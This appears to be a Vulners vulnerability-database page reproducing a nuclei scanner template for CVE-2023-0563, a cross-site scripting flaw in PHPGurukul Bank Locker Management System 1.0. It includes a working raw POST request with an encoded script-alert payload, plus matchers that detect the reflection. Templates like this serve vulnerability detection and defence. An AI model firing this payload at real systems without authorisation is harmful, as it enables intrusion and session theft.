Lucene search
K

Bank Locker Management System - Cross-Site Scripting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

Bank Locker Mgmt System - Cross-Site Scripting (CVE-2023-0563). Vulnerability in PHPGurukul 1.0 allows remote attack to inject malicious scripts and compromise user sessions

Related
Refs
Code
id: CVE-2023-0563

info:
  name: Bank Locker Management System - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://vuldb.com/?ctiid.219717
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0563
    - https://vuldb.com/?id.219717
    - https://github.com/ctflearner/ctflearner
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2023-0563
    cwe-id: CWE-79
    epss-score: 0.34771
    epss-percentile: 0.98223
    cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: phpgurukul
    product: bank_locker_management_system
  tags: cve2023,cve,blms,xss,phpgurukul,vuln

http:
  - raw:
      - |
        POST /search-locker-details.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        searchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "/><script>alert(document.domain)</script>")'
          - 'contains(body, "Bank Locker Management System")'
        condition: and
# digest: 4b0a004830460221009fb9d0734c95184cc0567f3b78dc2dce25a94f58abac08e3efe303025f3ace1a022100d78645edd72b256b484c1415bbb93592c2c5649f4d65fbbbb582dd8c638fbc66:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
3.8Low risk
Vulners AI Score3.8
CVSS 3.13.5 - 4.8
CVSS 24
CVSS 33.5
EPSS0.34771
30